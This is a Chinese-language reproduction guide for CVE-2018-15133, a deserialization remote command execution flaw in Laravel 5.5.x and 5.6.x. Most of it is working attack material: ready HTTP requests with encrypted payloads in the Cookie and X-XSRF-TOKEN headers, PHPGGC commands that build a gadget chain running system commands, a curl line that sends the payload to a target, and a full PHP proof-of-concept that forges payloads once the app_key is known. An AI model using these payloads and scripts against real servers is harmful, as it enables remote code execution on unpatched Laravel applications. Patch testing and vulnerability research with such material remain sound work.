(CVE-2018-15133)Laravel 反序列化远程命令执行漏洞¶
一、漏洞简介¶
利用前需要知道app_key,才可以进行利用。
二、漏洞影响¶
Laravel framework 5.5.x\<=5.5.40
Laravel framework 5.6.x\<=5.6.29
三、复现过程¶
漏洞分别可以在两个地方触发一个是直接添加在 cookie 字段,例如: Cookie: ATTACK=payload ;另一处是在 HTTP Header 处添加 X-XSRF-TOKEN 字段,例如: X-XSRF-TOKEN: payload 。
通过Cookie触发RCE¶
通过 Cookie 触发 RCE 的 EXP 如下(这里payload中执行的命令是
curl 127.0.0.1:8888
):
POST / HTTP/1.1
Host: www.0-sec.org:8000
Cookie: XDEBUG_SESSION=PHPSTORM; ATTACK=eyJpdiI6ImRhSTdpRkhWTFowVHNtNDMyZW5wWlE9PSIsInZhbHVlIjoiRHRRRXpRNUhkeG8rQ0s0a21qRmpzUHNkZ0lBaFpsVjlvYk1uZmtwOVpRVFZsdmNKSUhMQnJ0UlBWeHhrbElZb0ZaRnRmMjFlbTNSNXRXZGxCeEF2clNvbk5HT2FDZEEwSGVKU2VuUkFSeVhXTUEwVzFUYlRlc2RsWk1scEg3eWRUKzljRHBWQmEzMERRR0gydG4zYURzWEFcL2djUmFDVGJ5M2NMREVvMDhmeEE0dm5FTVJcL3UwZHBsUjhxajBHbFVBaHVRTWRzN3QwNU9XdWdISWZPaklkXC80alpKQjZEMlJTQjdVXC8wZ3BoNXVXWVFRK1NUSVM5OVhkSXRuSXpHZWRMcUJnR0RwVjlLeDNPUHMyNFpMbWJRPT0iLCJtYWMiOiIxM2M3YThiNmI4MWNkZmI1YjNhMGEzZDRjMDdkYTJiY2MyNzZhOWZkYzUwM2NiOTg1MGRiMTk0ZGU1MjhhOWE1In0=;
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0
通过HTTP Header触发RCE¶
通过 HTTP Header 触发 RCE 的 EXP
如下(这里payload中执行的命令是 curl 127.0.0.1:8888
):
POST / HTTP/1.1
Host: www.0-sec.org:8000
Cookie: XDEBUG_SESSION=PHPSTORM;
X-XSRF-TOKEN: eyJpdiI6ImRhSTdpRkhWTFowVHNtNDMyZW5wWlE9PSIsInZhbHVlIjoiRHRRRXpRNUhkeG8rQ0s0a21qRmpzUHNkZ0lBaFpsVjlvYk1uZmtwOVpRVFZsdmNKSUhMQnJ0UlBWeHhrbElZb0ZaRnRmMjFlbTNSNXRXZGxCeEF2clNvbk5HT2FDZEEwSGVKU2VuUkFSeVhXTUEwVzFUYlRlc2RsWk1scEg3eWRUKzljRHBWQmEzMERRR0gydG4zYURzWEFcL2djUmFDVGJ5M2NMREVvMDhmeEE0dm5FTVJcL3UwZHBsUjhxajBHbFVBaHVRTWRzN3QwNU9XdWdISWZPaklkXC80alpKQjZEMlJTQjdVXC8wZ3BoNXVXWVFRK1NUSVM5OVhkSXRuSXpHZWRMcUJnR0RwVjlLeDNPUHMyNFpMbWJRPT0iLCJtYWMiOiIxM2M3YThiNmI4MWNkZmI1YjNhMGEzZDRjMDdkYTJiY2MyNzZhOWZkYzUwM2NiOTg1MGRiMTk0ZGU1MjhhOWE1In0=;
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0
每个网站的app_key不同,生成的代码不同,可别傻傻的直接用上面的代码了。
- 使用PHPGGC生成反序列化代码
https://github.com/ianxtianxt/phpggc
运行phpggc 的条件是php cli的版本>=5.6
./phpggc 网站/路径 system id
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9
- 使用第脚本生成最终payload
<!-- -->
例子:
./cve-2018-15133.php 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9
'PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic
HTTP header for POST request:
X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9
curl www.0-sec.org:8000 -X POST -H 'X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9'| head -n 2
ps:也可以使用burp
poc¶
cve-2018-15133.php
#!/usr/bin/env php
<?php
/**
*
* [CVE-2018-15133] Laravel Framework <= 5.6.29 / <= 5.5.40 / ~ https://github.com/kozmic/laravel-poc-CVE-2018-15133/
*
* Author:
* - Ståle Pettersen ~ https://github.com/kozmic ~ https://twitter.com/kozmic
*/
echo "PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic\n\n";
if ($argc < 3 )
{
echo "Usage: " . $argv[0] . " <base64encoded_APP_KEY> <base64encoded-payload>" . PHP_EOL;
exit();
}
$key = $argv[1];
$value = $argv[2];
$cipher = 'AES-256-CBC'; // or 'AES-128-CBC'
$iv = random_bytes(openssl_cipher_iv_length($cipher)); // instead of rolling a dice ;)
$value = \openssl_encrypt(
base64_decode($value), $cipher, base64_decode($key), 0, $iv
);
if ($value === false) {
exit("Could not encrypt the data.");
}
$iv = base64_encode($iv);
$mac = hash_hmac('sha256', $iv.$value, base64_decode($key));
$json = json_encode(compact('iv', 'value', 'mac'));
if (json_last_error() !== JSON_ERROR_NONE) {
echo "Could not json encode data." . PHP_EOL;
exit();
}
//$encodedPayload = urlencode(base64_encode($json));
$encodedPayload = base64_encode($json);
echo "HTTP header for POST request: \nX-XSRF-TOKEN: " . $encodedPayload . PHP_EOL;